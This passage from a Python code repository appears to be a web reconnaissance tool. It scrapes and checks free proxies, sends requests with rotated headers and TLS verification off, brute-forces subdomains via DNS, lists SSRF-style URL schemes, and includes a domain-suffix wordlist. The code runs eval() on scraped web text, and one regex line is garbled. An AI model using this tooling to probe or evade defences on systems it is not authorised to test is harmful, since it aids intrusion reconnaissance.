68 |
69 |
70 | for ips, types in zip(proxy_ips,proxy_types):
71 |
72 | ip, type = self.dic['xiladaili']['sub'].sub(" ",ips.group()),\
73 | self.dic['xiladaili']['sub'].sub(" ",types.group())
74 | pro = eval(regex.Espace_eliminate.sub("", str((ip,type.lower()))))
75 | proxy = (pro[0].split(":")[0],pro[0].split(":")[1],pro[1])
76 | self.logger.info(f"ip : {proxy[0]} port : {proxy[1]} type : {proxy[2]}")
77 |
78 | self.container.put(proxy)
79 |
80 |
81 | def proxy_ip3366(self):
82 |
83 | for page in range(1,11):
84 | try:
85 | url, params = chambering(f"http://www.ip3366.net/?stype=1&page={page}", strike=False)
86 | result = requester(url,params,GET=True,timeout=None)
87 | text = regex.Espace_eliminate.sub("",result.text)
88 |
89 | proxy_ips, proxy_ports, proxy_types = self.dic['ip3366']['ip'].finditer(text),\
90 | self.dic['ip3366']['port'].finditer(text),\
91 | self.dic['ip3366']['type'].finditer(text)
92 |
93 | for ips, ports, types in zip(proxy_ips, proxy_ports, proxy_types):
94 |
95 | ip, port, type = self.dic['ip3366']['sub'].sub(" ",ips.group()),\
96 | self.dic['ip3366']['sub'].sub(" ",ports.group()),\
97 | self.dic['ip3366']['sub'].sub(" ",types.group())
98 |
99 | proxy = eval(regex.Espace_eliminate.sub("", str((ip,port,type.lower()))))
100 |
101 | self.logger.info(f"ip : {proxy[0]} port : {proxy[1]} type : {proxy[2]}")
102 |
103 | self.container.put(proxy)
104 | except:
105 | pass
106 |
107 | def proxy_iphuan(self):
108 | url, params = chambering("https://ip.ihuan.me/", strike=False)
109 |
110 | url = requester("https://ip.ihuan.me/",params,GET=True,timeout=None)
111 | links = [link.group() for link in self.dic['ip_huan']['link'].finditer(url.text)]
112 | print(links)
113 |
114 |
115 | for i in range(len(links)):
116 | # print("".join(["https://ip.ihuan.me/",links[i]]))
117 | link = self.dic['ip_huan']['sub'].sub("",links[i])
118 | print(link)
119 |
120 | result = requester("".join(["https://ip.ihuan.me/",link]))
121 | text = regex.Espace_eliminate.sub("",result)
122 | proxy_ips, proxy_ports = self.dic['ip_huan']['ip'].finditer(text),\
123 | self.dic['ip_huan']['port'].finditer(text)
124 |
125 | for ips, ports in zip(proxy_ips,proxy_ports):
126 | ip, port, type = ips.group(),\
127 | self.dic['ip_huan']['sub'].sub(" ",ports),\
128 | "http"
129 | # print(ip)
130 | self.container.put((ip,port,type))
131 |
132 |
133 | def executor(self):
134 | self.proxy_ip3366()
135 | # self.proxy_xiladaili()
136 | self.generator_proxies()
137 | # self.proxy_iphuan()
138 |
139 | return self.container
140 |
141 |
142 | @staticmethod
143 | def check_live(proxy):
144 | check_ip = "http://httpbin.org/ip"
145 | ip = proxy[0]+":"+proxy[1]
146 | try:
147 | response = requester(check_ip, data = None, timeout = 3, GET = True, proxy = ip)
148 | if not response is None:
149 |
150 | if proxy[0] in response.text:
151 | return True
152 | return False
153 | return False
154 | except ConnectTimeoutError:
155 | return False
156 |
157 |
158 |
159 | if __name__ == '__main__':
160 | pro = Proxy("qq.com","StreamLogger")
161 | # pro.proxy_iphuan()
162 | prox = pro.executor()
163 |
--------------------------------------------------------------------------------
/core/regex.py:
--------------------------------------------------------------------------------
1 | import re
2 | import requests
3 | from data import config
4 | from core.requester import requester
5 |
6 | """
7 | file:///
8 | dict://
9 | sftp://
10 | ldap://
11 | tftp://
12 | """
13 |
14 | Espace_eliminate = re.compile(r"\s+")
15 |
16 | IP_REGEX = re.compile(r"(\d{1,3}\.){3}\d{1,3}?")
17 |
18 | # URL_REGEX1 = re.compile(r"((http|https|ftp)|\s)://.+\.sina(\.com|\.cn).*\=.+?\" \b")
19 |
20 | SEPARATE_PARAMS = re.compile(r"")
21 |
22 | URL_REGEX = re.compile("(?<=href=\").+?(?=\")|(?<=href=\').+?(?=\')")
23 |
24 | img = re.compile("(.*)![](\"(.*?)img(.*?)\"(.*?)"))
")
34 | # URL_REGEX1 = re.compile(r"(?:[a-zA-Z]|[0-9]|[$-_@.&+]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+")
35 |
36 | # URL_REGEX3 = re.compile(r"http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+")
37 |
38 | # URL_REGEX2 = re.compile(r'(?i)\b((?:[a-z][\w-]+:(?:/{1,3}|[a-z0-9%])|www\d{0,3}[.]|[a-z0-9.\-]+[.][a-z]{2,4}/)(?:[^\s()<>]+|\(([^\s()<>]+|(\([^\s()<>]+\)))*\))+(?:\(([^\s()<>]+|(\([^\s()<>]+\)))*\)|[^\s`!()\[\]{};:\'".,<>?«»“”‘’]))')
39 | # URL_REGEX = re.compile(r'(?<=href=\").+?(?=\")|(?<=href=\').+?(?=\')')
40 |
41 | URL_PATH = re.compile(r"=\w+\b")
42 |
43 | # type = re.compile(r"http[s]+")
44 |
45 | # test2 = re.compile(r"http[s]?://(\w|[$-_@.&+=](sina))+")
46 | #
47 | # test = re.compile(r"http[s]?://(\w+\.sina(\.c(om|n))+)")
48 | #
49 | # test3 = re.compile(r"http[s]?://(\w+\.sina(\.c(om|n))).*=.+")
50 |
51 |
52 | """
53 | 这里的正则表达式犯了一个很蠢的错误,没有必要再用正则'sub'规则清洗多余的杂质,
54 | 因为finditer返回的也是match对象,利用分组group就可以正确提取,一开始弄错了,
55 | 后来才意识到,我也懒得改了就这样吧,可能代码复杂度稍微要高一点吧。
56 | """
57 |
58 | data5u = {'ip' : re.compile(r"(\d{1,3}\.){3}\d{1,3}?"),
59 | 'port' : re.compile(r"\d+",re.VERBOSE),
60 | 'type': re.compile(r"http[s]?"),
61 | 'sub' : re.compile(r"<([/]li)?.+?>",re.IGNORECASE)}
62 |
63 |
64 | xicidaili = {'ip' : re.compile(r"(\d{1,3}\.){3}\d{1,3}? | "),
65 | 'port' : re.compile(r"\d{1,5} | "),
66 | 'type': re.compile(r"http[s]? | ",re.IGNORECASE),
67 | 'sub' : re.compile(r"<([/]td)?.+?>",re.IGNORECASE)}
68 |
69 |
70 | iphai = {'ip' : re.compile(r"(\d{1,3}\.){3}\d{1,3}?"),
71 | 'port' : re.compile(r"\d{1,5} | "),
72 | 'type' : re.compile(r"http[s]? | ",re.IGNORECASE),
73 | 'sub' : re.compile(r"<([/]td)?.+?>",re.IGNORECASE)}
74 |
75 |
76 | xiladaili = {'ip' : re.compile(r"(\d{1,3}\.){3}\d{1,3}:\d+? | "),
77 | 'port' : re.compile(r":\d+?"),
78 | 'type' : re.compile(r"http[s]? | ",re.IGNORECASE),
79 | 'sub' : re.compile(r"<([/]td)?.+?>",re.IGNORECASE)}
80 |
81 |
82 | ip3366 = {'ip' : re.compile(r"(\d{1,3}\.){3}\d{1,3}? | "),
83 | 'port' : re.compile(r"\d{1,5} | "),
84 | 'type' : re.compile(r"http[s]? | ",re.IGNORECASE),
85 | 'sub' : re.compile(r"<([/]td)?.+?>",re.IGNORECASE)}
86 |
87 | jiangxianli = {'ip' : re.compile(r"(\d{1,3}\.){3}\d{1,3}? | "),
88 | 'port' : re.compile(r"\d{1,5} | "),
89 | 'type' : re.compile(r"https[s] | ",re.IGNORECASE),
90 | 'sub' : re.compile(r"<([/]td)?.+?>",re.IGNORECASE)}
91 |
92 | ip_huan = {'link': re.compile(r"\"\?page=.+?\""),
93 | 'ip' : re.compile(r"(\d{1,3}\.){3}\d{1,3}?"),
94 | 'port' : re.compile(r"\d{1,5} | "),
95 | 'sub' : re.compile(r"(<([/]td)?.+?>)|(\")")}
96 |
97 |
--------------------------------------------------------------------------------
/core/requester.py:
--------------------------------------------------------------------------------
1 | import logging
2 | from data import config
3 | from random import choice
4 |
5 | try:
6 | import requests
7 | import urllib3
8 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
9 | except ImportError:
10 | print("Need to install requests")
11 | quit()
12 |
13 | from urllib3.exceptions import (
14 | ProtocolError,
15 | ResponseError,
16 | ConnectTimeoutError,
17 | )
18 |
19 | # session = requests.session()
20 | def requester(url,data,GET,timeout = None,cookie = None,proxy = None):
21 |
22 |
23 | headers = {
24 | 'Accept' : '*/*',
25 | 'Accept-Encoding' : '*',
26 | 'Connection':'close',
27 | 'Referer' : choice(config.Referer),
28 | 'User-Agent':choice(config.User_agents)
29 | }
30 | GET, POST = (True, False) if GET else (False,True)
31 |
32 | try:
33 | # proxie = {'http' : '127.0.0.1:8080'}
34 |
35 | proxy = \
36 | {
37 | "http" : proxy
38 | }
39 |
40 | if GET:
41 |
42 | # with requests.session() as request:
43 | response = requests.get\
44 | (
45 | url,
46 | params = data,
47 | cookies = cookie,
48 | verify = False,
49 | timeout = timeout,
50 | stream = True,
51 | headers = headers,
52 | proxies = proxy
53 | )
54 | # response.encoding = 'utf-8'
55 |
56 | else:
57 | response = requests.post\
58 | (
59 | url,
60 | data = data,
61 | headers=headers,
62 | timeout=timeout,
63 | files = None,
64 | verify = False,
65 | proxies = None
66 | )
67 |
68 | response.encoding = 'utf-8'
69 |
70 | return response
71 |
72 | except (ProtocolError,ResponseError,ConnectTimeoutError):
73 | logging.warning("WAF")
74 | except Exception:
75 | pass
76 |
77 |
78 |
79 | if __name__ == '__main__':
80 | result = requester("http://httpbin.org/ip",data = None,GET = True)
81 | print(result.text)
82 |
83 |
84 |
85 |
86 |
--------------------------------------------------------------------------------
/core/subdomain.py:
--------------------------------------------------------------------------------
1 | import time
2 | import asyncio
3 | import aiodns
4 | from core.colors import blue_green,end
5 | from core.log import factory_logger,time
6 |
7 |
8 |
9 | class subdomain:
10 |
11 | def __init__(self,target,file,logger_type):
12 |
13 | self.file = file
14 | self.time = time
15 | self.subdomains = set()
16 | self.file_loader = asyncio.Queue()
17 | self.loop = asyncio.get_event_loop()
18 | self.domain = target.split(".", target.count(".") - 1)[-1]
19 | self.resolver = aiodns.DNSResolver(timeout=3, loop=self.loop)
20 | self.logger = factory_logger(logger_type, target, 'subdomain')
21 |
22 |
23 |
24 |
25 | def load_file(self):
26 | with open(f"data/{self.file}", "r", buffering=1024) as handle:
27 | for count in handle:
28 | prefix = handle.readline()
29 | subdomain = "".join([prefix.rstrip(), ".", self.domain])
30 |
31 | self.file_loader.put_nowait(subdomain)
32 |
33 |
34 |
35 | async def query(self):
36 | while True:
37 | domain = await self.file_loader.get()
38 | try:
39 | if await self.resolver.query(domain, 'A'):
40 | self.logger.info(f"{domain}")
41 | # self.logger2.info("query")
42 | self.subdomains.add(domain)
43 | # self.subdomains
44 |
45 | except aiodns.error.DNSError:
46 | pass
47 |
48 | finally:
49 | self.file_loader.task_done()
50 |
51 |
52 | async def process(self):
53 |
54 | tasks = [asyncio.create_task(self.query()) for _ in range(100)]
55 | await self.file_loader.join()
56 |
57 | for task in tasks:
58 | task.cancel()
59 |
60 | await asyncio.gather(*tasks, return_exceptions=True)
61 |
62 |
63 |
64 | def execution(self):
65 | try:
66 | self.load_file()
67 | self.loop.run_until_complete(self.process())
68 | # self.logger_count = factory_logger(logger_type,target, 'subdomain_count')
69 | # self.logger_count.info(f"{len(self.subdomains)}")
70 | print(f'{blue_green}[!][{self.time}] A total of {len(self.subdomains)} subdomains have been collected !{end}')
71 | return self.subdomains
72 | except Exception as e:
73 | return e
74 |
75 |
--------------------------------------------------------------------------------
/data/DNSPod.txt:
--------------------------------------------------------------------------------
1 | 2000.hu
2 | aaa
3 | aaa.pro
4 | aarp
5 | ab.ca
6 | abb
7 | abbott
8 | abc.name
9 | abogado
10 | ac
11 | ac.ae
12 | ac.at
13 | ac.be
14 | ac.cn
15 | ac.cr
16 | ac.cy
17 | ac.fj
18 | ac.fk
19 | ac.gg
20 | ac.id
21 | ac.il
22 | ac.im
23 | ac.in
24 | ac.ir
25 | ac.je
26 | ac.jp
27 | ac.kr
28 | ac.ma
29 | ac.ng
30 | ac.nz
31 | ac.om
32 | ac.pa
33 | ac.pg
34 | ac.th
35 | ac.ug
36 | ac.uk
37 | ac.vn
38 | ac.yu
39 | ac.za
40 | ac.zw
41 | aca.pro
42 | academy
43 | accenture
44 | accountant
45 | accountants
46 | acct.pro
47 | acg
48 | aco
49 | active
50 | actor
51 | ad
52 | ad.jp
53 | adac
54 | adm.br
55 | ads
56 | adult
57 | adv.br
58 | ae
59 | ae.org
60 | aeg
61 | aero
62 | aero.tt
63 | aeroport.fr
64 | af
65 | afl
66 | ag
67 | agency
68 | agr.br
69 | agrar.hu
70 | agro.pl
71 | ah.cn
72 | ai
73 | aichi.jp
74 | aid.pl
75 | aig
76 | airforce
77 | airtel
78 | akita.jp
79 | al
80 | alderney.gg
81 | alibaba
82 | alipay
83 | allfinanz
84 | alsace
85 | alt.na
86 | alt.za
87 | am
88 | am.br
89 | amica
90 | amsterdam
91 | an
92 | analytics
93 | android
94 | ao
95 | aomori.jp
96 | apartments
97 | app
98 | apple
99 | aq
100 | aquarelle
101 | ar
102 | ar.com
103 | aramco
104 | arc.pro
105 | archi
106 | army
107 | arpa
108 | arq.br
109 | art.br
110 | art.do
111 | art.dz
112 | arte
113 | arts.co
114 | arts.ro
115 | arts.ve
116 | as
117 | asia
118 | asn.au
119 | asn.lv
120 | ass.dz
121 | assedic.fr
122 | asso.fr
123 | asso.re
124 | associates
125 | at
126 | at.gg
127 | at.pn
128 | at.tc
129 | at.tf
130 | at.tt
131 | atm.pl
132 | ato.br
133 | attorney
134 | au
135 | au.com
136 | au.ms
137 | au.pn
138 | au.tc
139 | au.tt
140 | auction
141 | audi
142 | audio
143 | author
144 | auto
145 | auto.pl
146 | autos
147 | avocat.fr
148 | avocat.pro
149 | avoues.fr
150 | aw
151 | ax
152 | axa
153 | az
154 | azure
155 | ba
156 | baidu
157 | band
158 | bank
159 | bar
160 | bar.pro
161 | barcelona
162 | barclaycard
163 | barclays
164 | bargains
165 | barreau.fr
166 | bauhaus
167 | bayern
168 | bb
169 | bbc
170 | bbs.tr
171 | bbva
172 | bc.ca
173 | bcn
174 | bd
175 | be
176 | be.tc
177 | be.tt
178 | beats
179 | beer
180 | belgie.be
181 | bentley
182 | berlin
183 | best
184 | bet
185 | bf
186 | bg
187 | bg.tc
188 | bg.tf
189 | bh
190 | bharti
191 | bi
192 | bib.ve
193 | bible
194 | bid
195 | bike
196 | bing
197 | bingo
198 | bio
199 | bio.br
200 | biz
201 | biz.et
202 | biz.ki
203 | biz.om
204 | biz.pk
205 | biz.pl
206 | biz.tm
207 | biz.tt
208 | biz.vn
209 | bj
210 | bj.cn
211 | bl
212 | black
213 | blackfriday
214 | bloomberg
215 | blue
216 | bm
217 | bmd.br
218 | bms
219 | bmw
220 | bn
221 | bnl
222 | bnpparibas
223 | bo
224 | boats
225 | boehringer
226 | bolt.hu
227 | bom
228 | bond
229 | boo
230 | book
231 | boots
232 | bosch
233 | bostik
234 | bot
235 | bourse.za
236 | boutique
237 | box.tl
238 | bq
239 | br
240 | br.com
241 | br.ms
242 | br.tc
243 | bradesco
244 | brand.se
245 | bridgestone
246 | broadway
247 | broker
248 | brother
249 | brussels
250 | bs
251 | bt
252 | budapest
253 | bugatti
254 | build
255 | builders
256 | business
257 | buy
258 | buzz
259 | bv
260 | bw
261 | bxb.me
262 | by
263 | bz
264 | bzh
265 | ca
266 | ca.pn
267 | ca.tf
268 | ca.tt
269 | cab
270 | cafe
271 | cal
272 | call
273 | camera
274 | camp
275 | cancerresearch
276 | canon
277 | capetown
278 | capital
279 | car
280 | caravan
281 | cards
282 | care
283 | career
284 | careers
285 | cars
286 | cartier
287 | casa
288 | cash
289 | casino
290 | casino.hu
291 | cat
292 | catering
293 | cba
294 | cbn
295 | cc
296 | cci.fr
297 | cd
298 | ceb
299 | center
300 | ceo
301 | cern
302 | cf
303 | cfa
304 | cfd
305 | cg
306 | ch
307 | ch.gg
308 | ch.pn
309 | ch.tc
310 | ch.tf
311 | ch.vu
312 | chambagri.fr
313 | chanel
314 | channel
315 | chat
316 | cheap
317 | chiba.jp
318 | chirurgiens-dentiste
319 | chloe
320 | christmas
321 | chrome
322 | church
323 | chuzu.pro
324 | ci
325 | cim.br
326 | cipriani
327 | circle
328 | cisco
329 | citic
330 | city
331 | city.hu
332 | city.za
333 | cityeats
334 | ck
335 | cl
336 | claims
337 | cleaning
338 | click
339 | clinic
340 | clinique
341 | clothing
342 | cloud
343 | club
344 | club.tw
345 | clubmed
346 | cm
347 | cn
348 | cn.com
349 | cn.im
350 | cn.mn
351 | cn.ms
352 | cn.name
353 | cn.pn
354 | cng.br
355 | cngogo.com
356 | cnkk.org
357 | cnt.br
358 | co
359 | co.ae
360 | co.ag
361 | co.at
362 | co.be
363 | co.cc
364 | co.ck
365 | co.cm
366 | co.com
367 | co.cr
368 | co.dk
369 | co.gg
370 | co.hu
371 | co.id
372 | co.il
373 | co.im
374 | co.in
375 | co.ir
376 | co.je
377 | co.jp
378 | co.kr
379 | co.lc
380 | co.ma
381 | co.ms
382 | co.nl
383 | co.no
384 | co.nz
385 | co.om
386 | co.st
387 | co.th
388 | co.tt
389 | co.tv
390 | co.ug
391 | co.uk
392 | co.ve
393 | co.vi
394 | co.yu
395 | co.za
396 | co.zw
397 | coach
398 | codes
399 | coffee
400 | college
401 | cologne
402 | com
403 | com.ac
404 | com.ae
405 | com.ag
406 | com.ai
407 | com.ar
408 | com.au
409 | com.az
410 | com.band
411 | com.bb
412 | com.bh
413 | com.bi
414 | com.bm
415 | com.br
416 | com.bs
417 | com.bz
418 | com.ci
419 | com.cm
420 | com.cn
421 | com.co
422 | com.cu
423 | com.cy
424 | com.de
425 | com.do
426 | com.dz
427 | com.ec
428 | com.ee
429 | com.eg
430 | com.er
431 | com.es
432 | com.et
433 | com.fail
434 | com.fj
435 | com.fk
436 | com.fr
437 | com.ge
438 | com.gr
439 | com.gt
440 | com.gu
441 | com.hk
442 | com.hn
443 | com.hr
444 | com.ht
445 | com.im
446 | com.jo
447 | com.kh
448 | com.ki
449 | com.kw
450 | com.la
451 | com.lb
452 | com.lc
453 | com.lv
454 | com.ly
455 | com.mk
456 | com.mm
457 | com.mn
458 | com.mo
459 | com.ms
460 | com.mt
461 | com.mu
462 | com.mx
463 | com.my
464 | com.na
465 | com.nc
466 | com.nf
467 | com.ng
468 | com.ni
469 | com.nl
470 | com.np
471 | com.om
472 | com.pa
473 | com.pe
474 | com.pg
475 | com.ph
476 | com.pk
477 | com.pl
478 | com.pt
479 | com.py
480 | com.qa
481 | com.re
482 | com.ro
483 | com.ru
484 | com.sa
485 | com.sb
486 | com.sc
487 | com.sd
488 | com.se
489 | com.sg
490 | com.sh
491 | com.so
492 | com.st
493 | com.sv
494 | com.sy
495 | com.tn
496 | com.tr
497 | com.tt
498 | com.tw
499 | com.ua
500 | com.uy
501 | com.vc
502 | com.ve
503 | com.vet
504 | com.vn
505 | com.vu
506 | com.work
507 | com.ws
508 | com.ye
509 | commbank
510 | community
511 | company
512 | compare
513 | computer
514 | comsec
515 | condos
516 | conf.au
517 | conf.lv
518 | construction
519 | consulado.st
520 | consulting
521 | contact
522 | contractors
523 | cooking
524 | cool
525 | coop
526 | coop.br
527 | coop.tt
528 | corsica
529 | country
530 | coupons
531 | courses
532 | cpa.pro
533 | cq.cn
534 | cr
535 | credit
536 | creditcard
537 | creditunion
538 | cri.nz
539 | cricket
540 | crown
541 | crs
542 | cruises
543 | csc
544 | csiro.au
545 | cu
546 | cu.cc
547 | cuisinella
548 | cul.na
549 | cv
550 | cw
551 | cx
552 | cy
553 | cymru
554 | cyou
555 | cz
556 | cz.cc
557 | cz.co
558 | cz.tc
559 | cz.tf
560 | dabur
561 | dad
562 | dance
563 | date
564 | dating
565 | datsun
566 | day
567 | dclk
568 | dds.pro
569 | de
570 | de.com
571 | de.gg
572 | de.ms
573 | de.net
574 | de.pn
575 | de.tc
576 | de.tf
577 | de.tt
578 | de.vu
579 | dealer
580 | deals
581 | degree
582 | delivery
583 | dell
584 | deloitte
585 | delta
586 | democrat
587 | den.pro
588 | dental
589 | dentist
590 | desi
591 | design
592 | dev
593 | diamonds
594 | diet
595 | digital
596 | direct
597 | directory
598 | discount
599 | dj
600 | dk
601 | dk.org
602 | dk.tc
603 | dk.tt
604 | dm
605 | dni.us
606 | dnp
607 | dns.be
608 | dnt.pro
609 | do
610 | docs
611 | dog
612 | doha
613 | domain.name
614 | domains
615 | done.fail
616 | doosan
617 | download
618 | drive
619 | dubai
620 | durban
621 | dvag
622 | dz
623 | e164.arpa
624 | earth
625 | eat
626 | eb.cn
627 | ebiz.tw
628 | ec
629 | ecn.br
630 | ed.cr
631 | ed.jp
632 | edeka
633 | edu
634 | edu.ac
635 | edu.ai
636 | edu.ar
637 | edu.au
638 | edu.bh
639 | edu.bm
640 | edu.br
641 | edu.cc
642 | edu.ck
643 | edu.cn
644 | edu.co
645 | edu.do
646 | edu.dz
647 | edu.ec
648 | edu.eg
649 | edu.er
650 | edu.es
651 | edu.et
652 | edu.ge
653 | edu.gl
654 | edu.gr
655 | edu.gt
656 | edu.gu
657 | edu.hk
658 | edu.jo
659 | edu.kh
660 | edu.kw
661 | edu.lb
662 | edu.lc
663 | edu.lv
664 | edu.mm
665 | edu.mn
666 | edu.mo
667 | edu.ms
668 | edu.mt
669 | edu.mx
670 | edu.my
671 | edu.na
672 | edu.ng
673 | edu.ni
674 | edu.np
675 | edu.om
676 | edu.pa
677 | edu.pe
678 | edu.pk
679 | edu.pl
680 | edu.ps
681 | edu.pt
682 | edu.py
683 | edu.qa
684 | edu.sa
685 | edu.sb
686 | edu.sd
687 | edu.sg
688 | edu.sh
689 | edu.st
690 | edu.sv
691 | edu.tc
692 | edu.tf
693 | edu.tr
694 | edu.tt
695 | edu.tw
696 | edu.ua
697 | edu.uk
698 | edu.uy
699 | edu.ve
700 | edu.vn
701 | edu.vu
702 | edu.ws
703 | edu.ye
704 | edu.yu
705 | edu.za
706 | education
707 | edunet.tn
708 | ee
709 | eg
710 | eh
711 | ehime.jp
712 | email
713 | embaixada.st
714 | emerck
715 | energy
716 | eng.br
717 | eng.pro
718 | engineer
719 | engineering
720 | ens.tn
721 | enterprises
722 | epson
723 | equipment
724 | er
725 | ernet.in
726 | erni
727 | erotica.hu
728 | erotika.hu
729 | es
730 | es.tc
731 | es.tt
732 | esp.br
733 | esq
734 | estate
735 | et
736 | etc.br
737 | eti.br
738 | eu
739 | eu.com
740 | eu.org
741 | eu.tc
742 | eu.tf
743 | eu.tt
744 | eu.tv
745 | eun.eg
746 | eurovision
747 | eus
748 | events
749 | everbank
750 | exchange
751 | expert
752 | experts-comptables.f
753 | exposed
754 | express
755 | fage
756 | fail
757 | fairwinds
758 | faith
759 | fam.pk
760 | family
761 | fan
762 | fans
763 | far.br
764 | farm
765 | fashion
766 | fast
767 | fax.nr
768 | fed.us
769 | feedback
770 | ferrero
771 | fgov.be
772 | fh.se
773 | fhsk.se
774 | fhv.se
775 | fi
776 | fi.cr
777 | fie.ee
778 | film
779 | film.hu
780 | fin.ec
781 | fin.tn
782 | final
783 | finance
784 | financial
785 | firestone
786 | firm.co
787 | firm.in
788 | firm.ro
789 | firm.ve
790 | firmdale
791 | fish
792 | fishing
793 | fit
794 | fitness
795 | fj
796 | fj.cn
797 | fk
798 | flights
799 | florist
800 | flowers
801 | flsmidth
802 | fly
803 | fm
804 | fm.br
805 | fnd.br
806 | fo
807 | foo
808 | football
809 | ford
810 | forex
811 | forsale
812 | forum
813 | forum.hu
814 | fot.br
815 | foundation
816 | fox
817 | fr
818 | fr.gg
819 | fr.ms
820 | fr.pn
821 | fr.tt
822 | fr.vu
823 | fresenius
824 | frl
825 | frogans
826 | fst.br
827 | fukui.jp
828 | fukuoka.jp
829 | fukushima.jp
830 | fund
831 | furniture
832 | futbol
833 | fyi
834 | g12.br
835 | ga
836 | gal
837 | gallery
838 | game
839 | game.tw
840 | games.hu
841 | garden
842 | gb
843 | gb.com
844 | gb.net
845 | gbiz
846 | gc.ca
847 | gd
848 | gd.cn
849 | gdn
850 | ge
851 | gea
852 | geek.nz
853 | gen.in
854 | gen.nz
855 | gen.tr
856 | gent
857 | genting
858 | geometre-expert.fr
859 | gf
860 | gg
861 | ggee
862 | ggf.br
863 | gh
864 | gi
865 | gift
866 | gifts
867 | gifu.jp
868 | gives
869 | giving
870 | gl
871 | glass
872 | gle
873 | global
874 | globo
875 | gm
876 | gmail
877 | gmina.pl
878 | gmo
879 | gmx
880 | gn
881 | go.cr
882 | go.id
883 | go.jp
884 | go.kr
885 | go.th
886 | go.ug
887 | gob.do
888 | gob.es
889 | gob.gt
890 | gob.mx
891 | gob.ni
892 | gob.pa
893 | gob.pe
894 | gob.pk
895 | gob.sv
896 | gok.pk
897 | gold
898 | goldpoint
899 | golf
900 | gon.pk
901 | goo
902 | good.name
903 | goog
904 | google
905 | gop
906 | gop.pk
907 | gos.pk
908 | got
909 | gouv.fr
910 | gov
911 | gov.ac
912 | gov.ae
913 | gov.ai
914 | gov.ar
915 | gov.au
916 | gov.bh
917 | gov.bm
918 | gov.br
919 | gov.ck
920 | gov.cn
921 | gov.co
922 | gov.cy
923 | gov.do
924 | gov.dz
925 | gov.ec
926 | gov.eg
927 | gov.er
928 | gov.et
929 | gov.fj
930 | gov.fk
931 | gov.ge
932 | gov.gg
933 | gov.gr
934 | gov.gu
935 | gov.hk
936 | gov.il
937 | gov.im
938 | gov.in
939 | gov.ir
940 | gov.je
941 | gov.jo
942 | gov.jp
943 | gov.kh
944 | gov.kw
945 | gov.lb
946 | gov.lc
947 | gov.lv
948 | gov.mm
949 | gov.mn
950 | gov.mo
951 | gov.my
952 | gov.ng
953 | gov.np
954 | gov.om
955 | gov.pk
956 | gov.ps
957 | gov.pt
958 | gov.qa
959 | gov.ru
960 | gov.sa
961 | gov.sb
962 | gov.sd
963 | gov.sg
964 | gov.sh
965 | gov.st
966 | gov.sy
967 | gov.tn
968 | gov.tr
969 | gov.tt
970 | gov.tw
971 | gov.ua
972 | gov.uk
973 | gov.ve
974 | gov.vn
975 | gov.ws
976 | gov.ye
977 | gov.za
978 | gov.zw
979 | govt.nz
980 | gp
981 | gq
982 | gr
983 | gr.com
984 | gr.jp
985 | grainger
986 | graphics
987 | gratis
988 | green
989 | greta.fr
990 | gripe
991 | group
992 | gs
993 | gs.cn
994 | gsm.pl
995 | gt
996 | gu
997 | gub.uy
998 | gucci
999 | guernsey.gg
1000 | guge
1001 | guide
1002 | guitars
1003 | gunma.jp
1004 | guru
1005 | gv.at
1006 | gw
1007 | gx.cn
1008 | gy
1009 | gz.cn
1010 | ha.cn
1011 | hamburg
1012 | hangout
1013 | haus
1014 | hb.cn
1015 | he.cn
1016 | health
1017 | health.vn
1018 | healthcare
1019 | help
1020 | helsinki
1021 | here
1022 | hermes
1023 | hi.cn
1024 | hiphop
1025 | hiroshima.jp
1026 | hitachi
1027 | hiv
1028 | hj.cx
1029 | hk
1030 | hk.cn
1031 | hk.com
1032 | hk.ms
1033 | hk.tc
1034 | hl.cn
1035 | hm
1036 | hn
1037 | hn.cn
1038 | hockey
1039 | hokkaido.jp
1040 | holdings
1041 | holiday
1042 | home.kg
1043 | homedepot
1044 | homes
1045 | honda
1046 | horse
1047 | host
1048 | hosting
1049 | hotel.hu
1050 | hoteles
1051 | hotmail
1052 | house
1053 | how
1054 | hr
1055 | hsbc
1056 | ht
1057 | hu
1058 | hu.com
1059 | hu.tc
1060 | huissier-justice.fr
1061 | hyogo.jp
1062 | hyundai
1063 | ibaraki.jp
1064 | ibiz.cc
1065 | ibm
1066 | icbc
1067 | ice
1068 | icu
1069 | id
1070 | id.au
1071 | id.fj
1072 | id.ir
1073 | id.lv
1074 | idf.il
1075 | idv.hk
1076 | idv.tw
1077 | ie
1078 | ie.tc
1079 | ifm
1080 | igg.biz
1081 | iinet
1082 | il
1083 | im
1084 | imb.br
1085 | immo
1086 | immobilien
1087 | in
1088 | in.net
1089 | in.th
1090 | ind.br
1091 | ind.er
1092 | ind.gg
1093 | ind.gt
1094 | ind.in
1095 | ind.je
1096 | ind.tn
1097 | industries
1098 | inf.br
1099 | infiniti
1100 | info
1101 | info.au
1102 | info.co
1103 | info.et
1104 | info.ht
1105 | info.hu
1106 | info.ki
1107 | info.ms
1108 | info.nf
1109 | info.pl
1110 | info.ro
1111 | info.tm
1112 | info.tn
1113 | info.tt
1114 | info.ve
1115 | info.vn
1116 | ing
1117 | ing.pro
1118 | ingatlan.hu
1119 | ink
1120 | institute
1121 | insurance
1122 | insure
1123 | int
1124 | int.ar
1125 | int.co
1126 | int.pt
1127 | int.ru
1128 | int.tc
1129 | int.tf
1130 | int.tt
1131 | int.ve
1132 | int.vn
1133 | international
1134 | intl.tn
1135 | investments
1136 | io
1137 | ipiranga
1138 | iq
1139 | ir
1140 | irc.se
1141 | irc.su
1142 | irish
1143 | is
1144 | iselect
1145 | ishikawa.jp
1146 | ist
1147 | istanbul
1148 | it
1149 | it.pn
1150 | it.tc
1151 | itau
1152 | iwate.jp
1153 | iwc
1154 | iwi.nz
1155 | jaguar
1156 | java
1157 | jcb
1158 | je
1159 | jersey.je
1160 | jetzt
1161 | jewelry
1162 | jl.cn
1163 | jlc
1164 | jll
1165 | jm
1166 | jmp
1167 | jo
1168 | jobs
1169 | jobs.tt
1170 | joburg
1171 | jogasz.hu
1172 | jor.br
1173 | jot
1174 | joy
1175 | jp
1176 | jp.net
1177 | jp.pn
1178 | jpn.com
1179 | jprs
1180 | js.cn
1181 | juegos
1182 | jur.pro
1183 | jx.cn
1184 | k12.ec
1185 | k12.il
1186 | k12.tr
1187 | kagawa.jp
1188 | kagoshima.jp
1189 | kanagawa.jp
1190 | kanazawa.jp
1191 | kaufen
1192 | kawasaki.jp
1193 | kddi
1194 | ke
1195 | kfh
1196 | kg
1197 | kh
1198 | ki
1199 | kia
1200 | kim
